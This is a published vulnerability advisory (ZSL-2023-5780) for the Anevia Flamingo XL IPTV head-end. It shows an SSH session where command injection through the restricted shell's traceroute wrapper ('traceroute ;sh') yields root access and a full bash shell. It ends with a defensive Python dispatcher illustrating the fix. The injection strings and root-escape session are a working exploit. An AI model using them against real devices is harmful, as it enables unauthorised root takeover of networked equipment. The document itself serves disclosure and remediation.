Exploit Title: Anevia Flamingo XL 3.2.9 - Remote Root Jailbreak
Exploit Author: LiquidWorm
Product web page: https://www.ateme.com
Affected version: 3.2.9
                  Hardware revision 1.0
                  SoapLive 2.0.3

Summary: Flamingo XL is a new modular and high-density IPTV head-end product
for hospitality and corporate markets. Flamingo XL captures live TV and radio
content from satellite, cable, digital terrestrial and analog sources before
streaming it over IP networks to STBs, PCs or other IP-connected devices. The
Flamingo XL is based upon a modular 4U rack hardware platform that allows
hospitality and corporate video service providers to deliver a mix of channels
from various sources over internal IP networks.

Desc: Once the admin establishes a secure shell session, she is dropped into a
sandboxed environment by the login binary, which allows only a specific set of
commands. One of those commands, traceroute, can be exploited to escape the
jailed shell: its argument is handed to a shell without the token validation
the other wrappers apply, as the session below shows. A remote attacker can
break out of the restricted environment and gain full root access to the
device.

Tested on: GNU/Linux 3.1.4 (x86_64)
           Apache/2.2.15 (Unix)
           mod_ssl/2.2.15
           OpenSSL/0.9.8g
           DAV/2
           PHP/5.3.6

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2023-5780
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5780.php

13.04.2023

--

$ ssh -o KexAlgorithms=+diffie-hellman-group1-sha1 root@192.168.1.1
The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established.
RSA key fingerprint is SHA256:E6TaDYkszZMbS555THYEPVzv1DpzYrwJzW1TM4+ZSLk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.1' (RSA) to the list of known hosts.
Anevia Flamingo XL
root@192.168.1.1's password:

Primary-XL> help
available commands:
bonding config date dns enable ethconfig exit exp firewall help hostname
http igmpq imp ipconfig license log mail passwd persistent_logs ping reboot
reset route serial settings sslconfig tcpdump timezone traceroute upgrade
uptime version vlanconfig

Primary-XL> tcpdump ;id
tcpdump: illegal token: ;
Primary-XL> id
unknown command id
Primary-XL> whoami
unknown command whoami
Primary-XL> ping ;id
ping: ;id: Host name lookup failure
Primary-XL> traceroute ;id
BusyBox v1.1.2p2 (2012.04.24-09:33+0000) multi-call binary

Usage: traceroute [-FIldnrv] [-f 1st_ttl] [-m max_ttl] [-p port#] [-q nqueries]
        [-s src_addr] [-t tos] [-w wait] [-g gateway] [-i iface]
        [-z pausemsecs] host [data size]

trace the route ip packets follow going to "host"

Options:
        -F              Set the don't fragment bit
        -I              Use ICMP ECHO instead of UDP datagrams
        -l              Display the ttl value of the returned packet
        -d              Set SO_DEBUG options to socket
        -n              Print hop addresses numerically rather than symbolically
        -r              Bypass the normal routing tables and send directly to a host
        -v              Verbose output
        -m max_ttl      Set the max time-to-live (max number of hops)
        -p port#        Set the base UDP port number used in probes
                        (default is 33434)
        -q nqueries     Set the number of probes per ``ttl'' to nqueries
                        (default is 3)
        -s src_addr     Use the following IP address as the source address
        -t tos          Set the type-of-service in probe packets to the following value
                        (default 0)
        -w wait         Set the time (in seconds) to wait for a response to a probe
                        (default 3 sec)
        -g              Specify a loose source route gateway (8 maximum)

uid=0(root) gid=0(root) groups=0(root)

Primary-XL> version
Software Revision: Anevia Flamingo XL v3.2.9
Hardware Revision: 1.0
(c) Anevia 2003-2012

Primary-XL> traceroute ;sh
...
...
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
ls -al
drwxr-xr-x  19 root root  1024 Oct  3  2022 .
drwxr-xr-x  19 root root  1024 Oct  3  2022 ..
drwxr-xr-x   2 root root  1024 Oct 21  2013 bin
drwxrwxrwt   2 root root    40 Oct  3  2022 cores
drwxr-xr-x  13 root root 27648 May 22 00:53 dev
drwxr-xr-x   3 root root  1024 Oct 21  2013 emul
drwxr-xr-x  48 1000 1000  3072 Oct  3  2022 etc
drwxr-xr-x   3 root root  1024 Oct  3  2022 home
drwxr-xr-x  11 root root  3072 Oct 21  2013 lib
lrwxrwxrwx   1 root root    20 Oct 21  2013 lib32 -> /emul/ia32-linux/lib
lrwxrwxrwx   1 root root     3 Oct 21  2013 lib64 -> lib
drwx------   2 root root 12288 Oct 21  2013 lost+found
drwxr-xr-x   4 root root  1024 Oct 21  2013 mnt
drwxrwxrwt   2 root root    80 May 22 00:45 php_sessions
dr-xr-xr-x 177 root root     0 Oct  3  2022 proc
drwxr-xr-x   4 root root  1024 Oct 21  2013 root
drwxr-xr-x   2 root root  2048 Oct 21  2013 sbin
drwxr-xr-x  12 root root     0 Oct  3  2022 sys
drwxrwxrwt  26 root root  1140 May 22 01:06 tmp
drwxr-xr-x  10 1000 1000  1024 Oct 21  2013 usr
drwxr-xr-x  14 root root  1024 Oct 21  2013 var
ls /var/www/admin
_img                configuration.php                 log_securemedia.php  stream_dump.php
_lang               cores_and_logs_management.php     login.php            stream_services
_lib                dataminer_handshake.php           logout.php           streaming.php
_style              dvbt.php                          logs.php             support.php
about.php           dvbt_scan.php                     main.php             template
ajax                export.php                        manager.php          time.php
alarm.php           fileprogress.php                  network.php          toto.ts
alarm_view.php      firewall.php                      pear                 upload_helper.php
authentication.php  get_config                        power.php            uptime.php
bridges.php         get_enquiry_pending.php           read_settings.php    usbloader.php
cam.php             get_upgrade_error.php             receive_helper.php   version.php
channel.php         heartbeat.php                     rescrambling         webradio.php
channel_xl_list.php include                           rescrambling.php     webtv
check_state         input.php                         resilience           webtv.php
class               js                                resilience.php       xmltv.php
common              license.php                       restart_service.php
config_snmp.php     log.php                           set_oem.php
python -c 'import pty; pty.spawn("/bin/bash")'
root@Primary-XL:/# cd /usr/local/bin
root@Primary-XL:/usr/local/bin# ls -al login
-rwxr-xr-x 1 root root 35896 Feb 21  2012 login
root@Primary-XL:/usr/local/bin# cd ..
root@Primary-XL:/usr/local# ls commands/
bonding          firewall  mail             timezone
config           help      passwd           traceroute
date             hostname  persistent_logs  upgrade
dbg-serial       http      ping             uptime
dbg-set-oem      igmpq     route            version
dbg-updates-log  imp       serial           vlanconfig
dns              ipconfig  settings
ethconfig        license   sslconfig
exp              log       tcpdump
root@Primary-XL:/usr/local# exit
exit
Primary-XL> enable
password:
Primary-XL# ;]
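The root cause described in the advisory is a command wrapper that hands its argument to a shell without the token validation the other wrappers (tcpdump, ping) apply. As an added illustration of the fix, not the vendor's code, the following Python dispatcher validates every allowlisted command's arguments uniformly and executes the result as an argv list with no shell involved; the command directory path and the allowlist are assumptions.

```python
import re
import shlex
import subprocess

# Hypothetical hardened dispatcher for a restricted admin shell like the one the
# Flamingo XL login binary provides; path and allowlist are assumptions, not vendor code.
COMMAND_DIR = "/usr/local/commands"

# Allowlisted commands and how many positional arguments each may take.
ALLOWED = {"ping": 1, "traceroute": 1, "uptime": 0, "version": 0}

# Only a well-formed hostname or dotted IPv4 literal passes; ';', '|', '$', quotes,
# spaces and a leading '-' all fail, blocking shell metacharacters and option injection.
HOST_RE = re.compile(
    r"^(?=.{1,253}$)[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
    r"(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*$",
    re.IGNORECASE,
)

def valid_host(value: str) -> bool:
    return bool(HOST_RE.match(value))

def build_argv(line: str) -> list:
    """Validate one input line and return the argv to run, or raise ValueError."""
    tokens = shlex.split(line)  # shlex itself raises ValueError on unbalanced quotes
    if not tokens:
        raise ValueError("empty command")
    cmd, args = tokens[0], tokens[1:]
    if cmd not in ALLOWED:
        raise ValueError(f"unknown command {cmd}")
    if len(args) > ALLOWED[cmd]:
        raise ValueError(f"{cmd}: too many arguments")
    for arg in args:
        if not valid_host(arg):
            raise ValueError(f"{cmd}: illegal token {arg!r}")
    return [f"{COMMAND_DIR}/{cmd}", *args]

def rejects(line: str) -> bool:
    """True if the dispatcher refuses the line (handy for self-checks)."""
    try:
        build_argv(line)
    except ValueError:
        return True
    return False

def run(line: str) -> int:
    """Execute the validated argv directly; no shell ever interprets the input."""
    return subprocess.run(build_argv(line), shell=False, check=False).returncode
```

With this structure, "traceroute ;id" is refused at the same point where the device's tcpdump wrapper already refuses it, and even a validation gap could not become command execution because nothing is ever passed through a shell.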